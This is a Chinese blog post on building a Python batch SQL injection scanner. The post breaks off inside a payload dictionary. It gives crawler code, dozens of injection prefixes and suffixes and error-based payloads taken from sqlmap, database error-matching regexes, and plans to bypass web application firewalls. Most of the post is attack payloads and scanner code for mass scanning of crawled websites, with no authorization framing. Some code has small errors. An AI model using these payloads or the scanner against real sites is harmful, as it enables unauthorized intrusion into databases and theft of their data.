Python 批量SQL注入扫描

人海中偶尔有个背影让你觉得很眼熟,你不顾一切的奔过去,等那人转过头来,却是一张陌生的脸。

原始版本 1.0

流程图

    首先需要爬行该网站,获取到网站链接,然后再对这些链接进行检测,最后结果保存在本地。

工程设计

爬行链接

    惭愧,并没有用详细的正则表达式专门提取链接。使用的是寻找Href的值,然后剖去http与javascript。将爬行的结果保存在列表,因为可能一次性可能爬很多的链接,没有必要检测这么多的链接,所以最后做了一些筛选,只随机选择5个链接进行检测。

r_sql = re.findall('href="(.*?)"', r_crawl.content)
list_none = []
for sql_sql in r_sql:
    if 'php?' in sql_sql:
        if not 'http' in sql_sql and not 'jsvascript' in sql_sql:
            list_none.append(url + '/' + sql_sql.lstrip('/'))
        else:
            pass
    else:
        pass

    同理把php换成asp,aspx等就能爬行asp,aspx的链接。

验证注入

    思路是加上一些让能让数据库报错的东西,比如单引号,and1=2这样的。然后在链接上加上这些payloads,根据返回的页面是否有数据库报错语句。

SQL Payloads

payloads = ("'", "')", "';", '"', '")', '";',"--","-0",") AND 1998=1532 AND (5526=5526"," AND 5434=5692%23"," %' AND 5268=2356 AND '%'='"," ') AND 6103=4103 AND ('vPKl'='vPKl"," ' AND 7738=8291 AND 'UFqV'='UFqV",'`', '`)', '`;', '\\', "%27", "%%2727", "%25%27", "%60", "%5C")

数据库报错语句

sql_errors = {'SQL syntax':'mysql','syntax to use near':'mysql','MySQLSyntaxErrorException':'mysql','valid MySQL result':'mysql',
          'Access Database Engine':'Access','JET Database Engine':'Access','Microsoft Access Driver':'Access',
        'SQLServerException':'mssql','SqlException':'mssql','SQLServer JDBC Driver':'mssql','Incorrect syntax':'mssql',
          'MySQL Query fail':'mysql'
     }

    后面的就很好理解了,在爬行到的链接加上验证的payload,然后在返回的页面判断是否出现了数据库报错的语句,通过这种方式判断是否有注入。

优化

    的确是很粗糙啦,市面上大部分扫描注入的扫描器基本上都是这种思路。性能优化有几点,以后在写…

  1. 采集链接的时候还要深入二级目录下面采集,更加全面
  2. 注入的Payload可以用||1=1这样,绕过安全狗之类的软件检测注入
  3. 注入方式使用盲注检测
  4. 美观的输出显示
  5. 详细的注入过程

Langzi_SQL_INJECTION_2.0

简介

其实以前一直想移植sqlmap的检测注入功能,但是太多的事情耽搁迟迟没有动手,最近为了完善Langzi_Api不得不提前着手阅读sqlmap源码移植功能,在以前的文章说过sqlmap检测注入有5种方法,依次判断注入点,通过查看sqlmap目录下的文件很容易就找到注入的payload,使用正则把他们提取出来,然后加上验证即可。

检测方式

sqlmap有5中检测注入方式,排除了U 联合查询注入,S 多语句查询注入,T 基于时间盲注。
联合查询注入值截取了前面部分的payload检测方式。

保留E 错误型注入和B 布尔型注入。

然后在自定义一些注释符想让页面强制报错,完善部分。

获取前后缀拼接在注入链接前后,中间加载payload,发起网络请求,对于报错类型的对结果进行正则匹配,对盲注类型的对返回页面进行相似度判断。

联合查询有些复杂和基于时间盲注比较耗时,这里不提取验证了。

前后缀

首先前后缀,请求判断方式为

注入链接:url+前缀+payload+后缀
发起网络请求
根据返回结果判断

基于错误型的注入根据结果正则匹配就行,基于bool类型的要判断页面相似度。获取相似度使用difflib库。

获取sqlmap前后缀来源于:

sqlmap\boundaries.xml

用正则提取出来,保存前后缀的字典

'''
前缀与后缀
需要获取5个对象
RADNSTR # 随机字符串 4字节
RANDNUM # 随机数字 随便
RANDSTR1# 随机字符串 4字节后面修改
RANDSTR2# 同上
ORIGINAL# 获取url中的传递参数值
'''
pre_suf = {

    'pre_suf_1': {'prefix': ')',
                  'suffix': '('},

    'pre_suf_2': {'prefix': '))',
                  'suffix': '(('},

    'pre_suf_3': {'prefix': "')",
                  'suffix': "('"},

    'pre_suf_4': {'prefix': '"',
                  'suffix': '"'},

    'pre_suf_5': {'prefix': "'",
                  'suffix': "'"},

    'pre_suf_6': {'prefix': '")',
                  'suffix': '("'},

    'pre_suf_7': {'prefix': ')"',
                  'suffix': '"('},

    'pre_suf_8': {'prefix': ")'",
                  'suffix': "('"},

    'pre_suf_9': {'prefix': ')))',
                  'suffix': '((('},

    'pre_suf_10': {'prefix': ')',
                   'suffix': '%23'},

    'pre_suf_11': {'prefix': ')',
                   'suffix': '--+'},

    'pre_suf_12': {'prefix': "')",
                   'suffix': '%23'},

    'pre_suf_13': {'prefix': "')",
                   'suffix': '--+'},

    'pre_suf_14': {'prefix': '"',
                   'suffix': '%23'},

    'pre_suf_15': {'prefix': '"',
                   'suffix': '--+'},

    'pre_suf_16': {'prefix': "'",
                   'suffix': "--+"},

    'pre_suf_17': {'prefix': ')',
                   'suffix': ' AND ([RANDNUM]=[RANDNUM]'},

    'pre_suf_18': {'prefix': '))',
                   'suffix': ' AND (([RANDNUM]=[RANDNUM]'},

    'pre_suf_19': {'prefix': ')))',
                   'suffix': '( AND ((([RANDNUM]=[RANDNUM]'},

    'pre_suf_20': {'prefix': "')",
                   'suffix': " AND ('[RANDSTR]'='[RANDSTR]"},

    'pre_suf_21': {'prefix': "'))",
                   'suffix': " AND (('[RANDSTR]'='[RANDSTR]"},

    'pre_suf_22': {'prefix': "')))",
                   'suffix': " AND ((('[RANDSTR]'='[RANDSTR]"},

    'pre_suf_23': {'prefix': "'",
                   'suffix': " AND '[RANDSTR]'='[RANDSTR]"},

    'pre_suf_24': {'prefix': "')",
                   'suffix': " AND ('[RANDSTR]' LIKE '[RANDSTR]"},

    'pre_suf_25': {'prefix': "'))",
                   'suffix': " AND (('[RANDSTR]' LIKE '[RANDSTR]"},

    'pre_suf_26': {'prefix': "')))",
                   'suffix': " AND ((('[RANDSTR]' LIKE '[RANDSTR]"},

    'pre_suf_27': {'prefix': '")',
                   'suffix': ' AND ("[RANDSTR]"="[RANDSTR]'},

    'pre_suf_28': {'prefix': '"))',
                   'suffix': ' AND (("[RANDSTR]"="[RANDSTR]'},

    'pre_suf_29': {'prefix': '")))',
                   'suffix': ' AND ((("[RANDSTR]"="[RANDSTR]'},

    'pre_suf_30': {'prefix': '"',
                   'suffix': ' AND "[RANDSTR]"="[RANDSTR]'},

    'pre_suf_31': {'prefix': '")',
                   'suffix': ' AND ("[RANDSTR]" LIKE "[RANDSTR]'},

    'pre_suf_32': {'prefix': '"))',
                   'suffix': ' AND (("[RANDSTR]" LIKE "[RANDSTR]'},

    'pre_suf_33': {'prefix': '")))',
                   'suffix': ' AND ((("[RANDSTR]" LIKE "[RANDSTR]'},

    'pre_suf_34': {'prefix': '"',
                   'suffix': ' AND "[RANDSTR]" LIKE "[RANDSTR]'},

    'pre_suf_35': {'prefix': ' ',
                   'suffix': '# [RANDSTR]'},

    'pre_suf_36': {'prefix': ' ',
                   'suffix': '%23'},

    'pre_suf_38': {'prefix': "'",
                   'suffix': " OR '[RANDSTR1]'='[RANDSTR2]"},

    'pre_suf_39': {'prefix': "') WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': '%23'},

    'pre_suf_40': {'prefix': "') WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': '--+'},

    'pre_suf_41': {'prefix': '") WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '%23'},

    'pre_suf_42': {'prefix': '") WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '--+'},

    'pre_suf_43': {'prefix': ') WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '%23'},

    'pre_suf_44': {'prefix': ') WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '--+'},

    'pre_suf_45': {'prefix': "' WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': '%23'},

    'pre_suf_46': {'prefix': "' WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': '--+'},

    'pre_suf_47': {'prefix': '" WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '%23'},

    'pre_suf_48': {'prefix': '" WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '--+'},

    'pre_suf_49': {'prefix': ' WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '%23'},

    'pre_suf_50': {'prefix': ' WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '--+'},

    'pre_suf_51': {'prefix': "'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': "||'"},

    'pre_suf_52': {'prefix': "'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': "||'"},

    'pre_suf_53': {'prefix': "'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': "+'"},

    'pre_suf_54': {'prefix': "||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': '||'},

    'pre_suf_55': {'prefix': "||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': '||'},

    'pre_suf_56': {'prefix': '+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '+'},

    'pre_suf_57': {'prefix': "+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': '+'},

    'pre_suf_58': {'prefix': "')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': '%23'},

    'pre_suf_59': {'prefix': "')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': '--+'},

    'pre_suf_60': {'prefix': '")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '%23'},

    'pre_suf_61': {'prefix': '")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '--+'},

    'pre_suf_62': {'prefix': ')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '%23'},

    'pre_suf_63': {'prefix': ')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '--+'},

    'pre_suf_64': {'prefix': "') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': '%23'},

    'pre_suf_65': {'prefix': "') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]",
                   'suffix': '--+'},

    'pre_suf_66': {'prefix': '") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '%23'},

    'pre_suf_67': {'prefix': '") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '--+'},

    'pre_suf_68': {'prefix': ') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '%23'},

    'pre_suf_69': {'prefix': ') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '--+'},

    'pre_suf_70': {'prefix': '` WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '--+'},

    'pre_suf_71': {'prefix': '` WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '%23'},

    'pre_suf_72': {'prefix': '`) WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '%23'},

    'pre_suf_73': {'prefix': '`) WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': '--+'},

    'pre_suf_74': {'prefix': '`=`[ORIGINAL]`',
                   'suffix': ' AND `[ORIGINAL]`=`[ORIGINAL]'},

    'pre_suf_75': {'prefix': '"="[ORIGINAL]"',
                   'suffix': ' AND "[ORIGINAL]"="[ORIGINAL]'},

    'pre_suf_76': {'prefix': ']-(SELECT 0 WHERE [RANDNUM]=[RANDNUM]',
                   'suffix': ')|[[ORIGINAL]'},

    'pre_suf_77': {'prefix': "' IN BOOLEAN MODE)",
                   'suffix': '#'}

}

报错型

先看看让页面强制报错的部分payload,我做了一些整理但是可能还不完全。

level11_payloads = (
"'", "')", "';", '"', '")', '";', ' order By 500 ', "--", "-0", ") AND 1998=1532 AND (5526=5526", " AND 5434=5692%23",
" %' AND 5268=2356 AND '%'='", " ') AND 6103=4103 AND ('vPKl'='vPKl",
" ' AND 7738=8291 AND 'UFqV'='UFqV", '`', '`)', '`;', '\\', "%27", "%%2727", "%25%27", "%60", "%5C",
"'and (select 1 from (select count(*),concat(database(),':',floor(rand()*2)) as a from information_schema.tables group by a)as b limit 0,1)--+")

这个列表的内容为一些加载url后缀,如果没有waf拦截并且网址程序员没有做过滤的话,带入到数据库执行会报错,为了编码统一对这些后缀进行url编码。

from urlib import quote
level1_payloads = [quote(x) for x in level11_payloads]

如果页面报错了就会根据下面字典重的键与值进行正则匹配判断,报错内容来源于

sqlmap\xml\errors.xml

用正则提取出来报错的内容和对应的数据库类型,整合在一个字典中

sql_errors = {'SQL syntax': 'MYSQL',
              'syntax to use near': 'MYSQL',
              'MySQLSyntaxErrorException': 'MYSQL',
              'valid MySQL result': 'MYSQL',
              'SQL syntax.*?MySQL': 'MYSQL',
              'Warning.*?mysql_': 'MYSQL',
              'MySqlException \(0x': 'MYSQL',
              "PostgreSQL.*?ERROR": "PostgreSQL",
              "Warning.*?\Wpg_": "PostgreSQL",
              "valid PostgreSQL result": "PostgreSQL",
              "Npgsql\.": "PostgreSQL",
              "PG::SyntaxError:": "PostgreSQL",
              "org\.postgresql\.util\.PSQLException": "PostgreSQL",
              "ERROR:\s\ssyntax error at or near": "PostgreSQL",
              "Driver.*? SQL[\-\_\ ]*Server": "Microsoft SQL Server",
              "OLE DB.*? SQL Server": "Microsoft SQL Server",
              "SQL Server[^<"]+Driver": "Microsoft SQL Server",
              "Warning.*?(mssql|sqlsrv)_": "Microsoft SQL Server",
              "SQL Server[^<"]+[0-9a-fA-F]{8}": "Microsoft SQL Server",
              "System\.Data\.SqlClient\.SqlException": "Microsoft SQL Server",
              "(?s)Exception.*?\WRoadhouse\.Cms\.": "Microsoft SQL Server",
              "Microsoft SQL Native Client error '[0-9a-fA-F]{8}": "Microsoft SQL Server",
              "com\.microsoft\.sqlserver\.jdbc\.SQLServerException": "Microsoft SQL Server",
              "ODBC SQL Server Driver": "Microsoft SQL Server",
              "ODBC Driver \d+ for SQL Server": "Microsoft SQL Server",
              "SQLServer JDBC Driver": "Microsoft SQL Server",
              "macromedia\.jdbc\.sqlserver": "Microsoft SQL Server",
              "com\.jnetdirect\.jsql": "Microsoft SQL Server",
              "SQLSrvException": "Microsoft SQL Server",
              "Microsoft Access (\d+ )?Driver": "Microsoft Access",
              "JET Database Engine": "Microsoft Access",
              "Access Database Engine": "Microsoft Access",
              "ODBC Microsoft Access": "Microsoft Access",
              "Syntax error \(missing operator\) in query expression": "Microsoft Access",
              "ORA-\d{5}": "Oracle",
              "Oracle error": "Oracle",
              "Oracle.*?Driver": "Oracle",
              "Warning.*?\Woci_": "Oracle",
              "Warning.*?\Wora_": "Oracle",
              "oracle\.jdbc\.driver": "Oracle",
              "quoted string not properly terminated": "Oracle",
              "SQL command not properly ended": "Oracle",
              "DB2 SQL error": "CLI Driver.*?DB2",
              "db2_\w+\(": "CLI Driver.*?DB2",
              "SQLSTATE.+SQLCODE": "CLI Driver.*?DB2",
              'check the manual that corresponds to your (MySQL|MariaDB) server version': 'MYSQL',
              "Unknown column '[^ ]+' in 'field list'": 'MYSQL',
              "MySqlClient\.": 'MYSQL',
              'com\.mysql\.jdbc\.exceptions': 'MYSQL',
              'Zend_Db_Statement_Mysqli_Exception': 'MYSQL',
              'Access Database Engine': 'Microsoft Access',
              'JET Database Engine': 'Microsoft Access',
              'Microsoft Access Driver': 'Microsoft Access',
              'SQLServerException': 'Microsoft SQL Server',
              'SqlException': 'Microsoft SQL Server',
              'SQLServer JDBC Driver': 'Microsoft SQL Server',
              'Incorrect syntax': 'Microsoft SQL Server',
              'MySQL Query fail': 'MYSQL',
              'Unknown column.*?order clause': 'MYSQL'
              }

这是我自己完善的第一步,第二步就是加载使用sqlmap的错误型注入payload,内容来源是:

sqlmap\payloads\error_based.xml

同样根据正则提取内容,保存在一个新的列表中,sqlmap的巧妙之处在于使用随机获取的参数进行验证

'''
需要一些特定的参数
DELIMITER_START # 随机字符作为开头
RANDNUM # 随机数字
DELIMITER_STOP # 随机字符作为结尾
RANDNUM1 # 随机数字+1
RANDNUM2 # 随机数字+2
RANDNUM3 # 随机数字+3
RANDNUM4 # 随机数字+4
RANDNUM5 # 随机数字+5
'''
error_base_injection = {
    'INJPAY_27':
        {'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))"},
    'INJPAY_26':
        {'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')"},
    'INJPAY_25':
        {'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')"},
    'INJPAY_24':
        {'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)"},
    'INJPAY_23':
        {'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)"},
    'INJPAY_22':
        {'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')"},
    'INJPAY_21':
        {'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')"},
    'INJPAY_20':
        {'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))"},
    'INJPAY_50':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))"},
    'INJPAY_29':
        {'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))"},
    'INJPAY_28':
        {'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))"},
    'INJPAY_51':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])"},
    'INJPAY_38':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))"},
    'INJPAY_39':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " (EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')))"},
    'INJPAY_55':
        {'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,(SELECT [RANDNUM] WHERE [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))"},
    'INJPAY_30':
        {'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))"},
    'INJPAY_31':
        {'dbms': 'Firebird', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')"},
    'INJPAY_32':
        {'dbms': 'Firebird', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')"},
    'INJPAY_33':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')),1)"},
    'INJPAY_34':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))"},
    'INJPAY_35':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))"},
    'INJPAY_36':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))"},
    'INJPAY_37':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"},
    'INJPAY_12':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)"},
    'INJPAY_13':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)"},
    'INJPAY_10':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])"},
    'INJPAY_11':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])"},
    'INJPAY_16':
        {'dbms': 'PostgreSQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)"},
    'INJPAY_17':
        {'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))"},
    'INJPAY_14':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)"},
    'INJPAY_15':
        {'dbms': 'PostgreSQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)"},
    'INJPAY_18':
        {'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))"},
    'INJPAY_19':
        {'dbms': 'Microsoft SQL Server', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))"},
    'INJPAY_52':
        {'dbms': 'MySQL', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,(SELECT [RANDNUM] FROM (SELECT ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x))s)"},
    'INJPAY_56':
        {'dbms': 'Oracle', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
         'payload': " ,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)"},
    'INJPAY_57':
        {'dbms': 'Firebird', 'grep': '[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]',
